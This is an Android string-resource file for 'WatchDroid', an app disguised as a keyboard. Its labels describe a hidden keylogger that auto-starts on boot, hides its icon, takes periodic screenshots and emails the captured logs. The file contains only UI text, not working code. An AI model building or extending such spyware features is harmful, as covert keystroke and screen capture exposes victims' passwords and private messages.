<resources>
    <string name="app_name">WatchDroid</string>
    <string name="key_name">WatchDroid Keyboard</string>
    <string name="subtype_en_US">English (US)</string>
    <string name="title_activity_settings">Settings</string>
    <string name="label_go_key">Go</string>
    <string name="label_next_key">Next</string>
    <string name="label_send_key">Send</string>
    <string name="settings_name">WatchDroid Keyboard Settings</string>
    <string name="language_selection_title">Input languages</string>
    <string name="select_language">Select input languages</string>
    //Tab bar
    <string name="home">Home</string>
    <string name="settings">Settings</string>

    //home
    <string name="status">Status</string>
    <string name="keylogger">Keylogger Status :</string>
    <string name="passonoffhome">Password protection :</string>
    //settings
    <string name="general_category">General</string>
    <string name="password_category">Password</string>
    <string name="keylogboot">Start on Boot</string>
    <string name="keylogbootinfo">Auto start keylogger on bootup</string>
    <string name="passonoff">Password</string>
    <string name="passinfo">Enable or disable password</string>
    <string name="key_log">Log</string>
    <string name="key_log_view">View Log</string>
    <string name="set_pass">Password</string>
    <string name="set_pass_info">Set password for WatchDroid</string>
    <string name="hideicon_category">Hide Icon</string>
    <string name="lockscreen">Lock Screen</string>
    //set password
    <string name="first_num_pos">First number position :</string>
    <string name="first_num">First number :</string>
    <string name="second_num_pos">Second number position :</string>
    <string name="second_num">Second number :</string>
    <string name="save">Save</string>
    <string name="first_num_pos_s">Select Position</string>
    <string name="second_num_pos_s">Select Position</string>

    <!-- Symbols that are commonly considered word separators in this language -->
    <string name="word_separators">\u0020.,;:!?\n()[]*&amp;@{}/&lt;&gt;_+=|&quot;</string>

    //lockscreen
    <string name="ask_pass">Enter Password</string>
    <string name="unlock">Unlock</string>
    <string name="simplify">Simplify log</string>
    <string name="check">Check Log</string>
    <string name="clearlog">Clear</string>
    <string name="loved">Loved</string>
    <string name="enterpass">Enter Password</string>
    <string name="next">Next</string>
    <string name="cscreen">Capture screen</string>
    <string name="cscreensummary">It captures time to time screenshots</string>
    <string name="set_mail">Send log</string>
    <string name="title_activity_set_email">Set Email ID</string>
    <string name="title_activity_setmail">Set Email</string>

</resources>
